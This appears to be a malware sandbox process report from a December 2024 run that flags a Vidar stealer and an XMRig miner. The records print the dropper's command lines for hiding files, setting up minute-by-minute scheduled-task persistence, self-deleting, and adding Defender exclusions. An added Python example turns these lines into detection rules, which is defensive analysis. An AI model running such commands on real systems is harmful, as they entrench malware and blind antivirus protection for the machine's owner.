                                                                                                                                                                                                                              MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                              Start time:21:14:28
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

Target ID: 15
Start time: 21:14:28
Start date: 20/12/2024
Path: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe"
Imagebase: 0x7d0000
File size: 22'016 bytes
MD5 hash: 04F57C6FB2B2CD8DCC4B38E4A93D4366
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 57%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 16
Start time: 21:14:28
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 21:14:28
Start date: 20/12/2024
Path: C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit): false
Commandline: 7z.exe e extracted/file_4.zip -oextracted
Imagebase: 0x1d0000
File size: 468'992 bytes
MD5 hash: 619F7135621B50FD1900FF24AADE1524
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 21:14:28
Start date: 20/12/2024
Path: C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit): false
Commandline: 7z.exe e extracted/file_3.zip -oextracted
Imagebase: 0x1d0000
File size: 468'992 bytes
MD5 hash: 619F7135621B50FD1900FF24AADE1524
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 21:14:28
Start date: 20/12/2024
Path: C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit): false
Commandline: 7z.exe e extracted/file_2.zip -oextracted
Imagebase: 0x1d0000
File size: 468'992 bytes
MD5 hash: 619F7135621B50FD1900FF24AADE1524
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 21:14:28
Start date: 20/12/2024
Path: C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit): false
Commandline: 7z.exe e extracted/file_1.zip -oextracted
Imagebase: 0x1d0000
File size: 468'992 bytes
MD5 hash: 619F7135621B50FD1900FF24AADE1524
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 21:14:28
Start date: 20/12/2024
Path: C:\Windows\System32\attrib.exe
Wow64 process (32bit): false
Commandline: attrib +H "in.exe"
Imagebase: 0x7ff6fcb40000
File size: 23'040 bytes
MD5 hash: 5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 21:14:28
Start date: 20/12/2024
Path: C:\Users\user\AppData\Local\Temp\main\in.exe
Wow64 process (32bit): false
Commandline: "in.exe"
Imagebase: 0x7ff76df70000
File size: 1'827'328 bytes
MD5 hash: 83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 21:14:29
Start date: 20/12/2024
Path: C:\Windows\System32\attrib.exe
Wow64 process (32bit): false
Commandline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase: 0x7ff6fcb40000
File size: 23'040 bytes
MD5 hash: 5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 21:14:29
Start date: 20/12/2024
Path: C:\Windows\System32\attrib.exe
Wow64 process (32bit): false
Commandline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase: 0x7ff6fcb40000
File size: 23'040 bytes
MD5 hash: 5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell ping 127.0.0.1; del in.exe
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                              Start time:21:14:30
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                                                                                              Imagebase:0x7ff6b02e0000
                                                                                                                                                                                                                              File size:22'528 bytes
                                                                                                                                                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                              Start time:21:14:30
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"
                                                                                                                                                                                                                              Imagebase:0xff0000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                              Start time:21:14:30
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

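The process records above show the dropper hiding its payload with attrib +H, registering a scheduled task that fires every minute, removing its own staging binary behind a ping delay, and adding a Defender path exclusion. The following is an added example, not part of the Joe Sandbox report, that runs simple detection logic over those command lines and then correlates findings by the file path they touch, so a single payload that is hidden, scheduled and executed stands out. The command lines are transcribed here as a constructed sample; the rule labels, the user-writable path heuristic and the use of None for the first record's Target ID (which the excerpt does not show) are assumptions of the example.

```python
import re
from collections import defaultdict
from typing import NamedTuple, Optional


class Proc(NamedTuple):
    target_id: Optional[int]  # None where the excerpt does not show the ID
    path: str                 # image path as reported
    cmdline: str              # command line as reported


class Finding(NamedTuple):
    target_id: Optional[int]
    label: str      # short technique label (ATT&CK id noted beside each rule)
    artifact: str   # file path the behaviour touches, used for correlation
    detail: str


# Constructed sample: the command lines transcribed from the records above.
SAMPLE = [
    Proc(None, r"C:\Windows\System32\attrib.exe",
         r"attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe"),
    Proc(25, r"C:\Windows\System32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    Proc(26, r"C:\Windows\System32\schtasks.exe",
         r'schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE'),
    Proc(28, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"powershell ping 127.0.0.1; del in.exe"),
    Proc(31, r"C:\Windows\System32\PING.EXE", r'"C:\Windows\system32\PING.EXE" 127.0.0.1'),
    Proc(32, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         r'"powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"'),
    Proc(34, r"C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe",
         r"C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe"),
]

# Heuristic (assumed for this example): locations a standard user can write to.
# A binary hidden, scheduled or run from one of these is far more suspicious
# than the same action on a system path.
USER_WRITABLE = re.compile(r"(?i)\\(?:Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Windows\\Temp)\\")


def user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.search(path))


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(p: Proc) -> list:
    """Apply each rule to one process record; returns zero or more findings."""
    out = []
    img = image_name(p.path)
    cmd = p.cmdline
    low = cmd.lower()

    # Scheduled task (T1053.005) with a minute-level trigger or a user-writable target.
    if img == "schtasks.exe" and "/create" in low:
        tr = re.search(r'/tr\s+(?:"([^"]*)"|(\S+))', cmd, re.I)
        sc = re.search(r"/sc\s+(\w+)", cmd, re.I)
        target = (tr.group(1) or tr.group(2)) if tr else ""
        sched = sc.group(1).upper() if sc else "?"
        if sched == "MINUTE" or user_writable(target):
            out.append(Finding(p.target_id, "persistence:schtasks", target,
                               f"task runs every {sched}: {target}"))

    # attrib +H on a file in a user-writable location (T1564.001).
    if img == "attrib.exe" and re.search(r"\s\+h\b", low):
        target = cmd.split()[-1]
        if user_writable(target):
            out.append(Finding(p.target_id, "evasion:hidden-file", target,
                               "attrib +H on user-writable path"))

    if img in ("powershell.exe", "pwsh.exe", "cmd.exe"):
        # Defender exclusion or tamper via Add-/Set-MpPreference (T1562.001).
        m = re.search(r'(?:add|set)-mppreference\s+-(exclusion\w+|disable\w+)\s+"?([^"\s]*)', cmd, re.I)
        if m:
            out.append(Finding(p.target_id, "evasion:defender-tamper", m.group(2),
                               f"-{m.group(1)} {m.group(2)}"))
        # ping used as a sleep, then delete: the dropper removing itself (T1070.004).
        m = re.search(r"ping\s+(?:-n\s+\d+\s+)?\S+.*?(?:;|&&?|\|)\s*(?:del|erase|remove-item|rm)\s+(\S+)", cmd, re.I)
        if m:
            out.append(Finding(p.target_id, "anti-forensics:self-delete", m.group(1),
                               "delay-then-delete pattern"))

    # Any image executing from a user-writable location.
    if user_writable(p.path):
        out.append(Finding(p.target_id, "execution:user-writable-path", p.path,
                           "image runs from user-writable directory"))
    return out


def correlate(procs) -> dict:
    """Group labels by artifact path (case-insensitive) across all records."""
    by_path = defaultdict(set)
    for p in procs:
        for f in triage(p):
            by_path[f.artifact.lower()].add(f.label)
    return {k: sorted(v) for k, v in by_path.items()}


if __name__ == "__main__":
    for p in SAMPLE:
        for f in triage(p):
            print(f"target {f.target_id}: {f.label} [{f.detail}]")
    for path, labels in correlate(SAMPLE).items():
        print(f"{path}: {', '.join(labels)}")
```

The conhost.exe and PING.EXE records produce no findings on their own; the value of the ping line is only as the child of the PowerShell self-delete command, which is why the rule keys on the parent's command line rather than on ping itself. Running the file prints one finding per suspicious record and then the per-path correlation, where the Intel_PTT_EK_Recertification.exe path collects the hide, schedule and execute labels.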
Target ID:34
Start time:21:14:31
Start date:20/12/2024
Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:0x7ff6e1c00000
File size:1'827'328 bytes
MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                              Start time:21:14:31
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:explorer.exe
                                                                                                                                                                                                                              Imagebase:0x7ff72b770000
                                                                                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000002.2597232510.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000002.2598240255.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000002.2597232510.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                              Start time:21:14:31
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                              Start time:21:14:31
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                              Start time:21:14:32
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                                                                                                                                                                              Imagebase:0x7ff6b02e0000
                                                                                                                                                                                                                              File size:22'528 bytes
                                                                                                                                                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                              Start time:21:14:33
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                                                                                                                                                                                                                              Imagebase:0xff0000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                              Start time:21:14:33
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                              Start time:21:14:40
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe"
                                                                                                                                                                                                                              Imagebase:0x300000
                                                                                                                                                                                                                              File size:4'471'808 bytes
                                                                                                                                                                                                                              MD5 hash:6D3D9DB92D0303C635E5EE37927AF3D0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                              Start time:21:14:44
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:147'968 bytes
                                                                                                                                                                                                                              MD5 hash:CC36E2A5A3C64941A79C31CA320E9797
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe, Author: Joe Security
Has exited:true

Target ID:44
Start time:21:14:44
Start date:20/12/2024
Path:C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe
Wow64 process (32bit):false
Commandline:"C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe"
Imagebase:0x220d3470000
File size:1'058'336 bytes
MD5 hash:971B0519B1C0461DB6700610E5E9CA8E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:21:14:45
Start date:20/12/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff6eef20000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:46
Start time:21:14:48
Start date:20/12/2024
Path:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe"
Imagebase:0x400000
File size:1'881'088 bytes
MD5 hash:8A1AE39FD06F240834EE7731E4470D2F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 38%, ReversingLabs
Has exited:true

Target ID:49
Start time:21:14:57
Start date:20/12/2024
Path:C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe"
Imagebase:0xbe0000
File size:1'831'936 bytes
MD5 hash:C20D4E11E1046A5665D427BB4F6DE39E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:50
Start time:21:15:01
Start date:20/12/2024
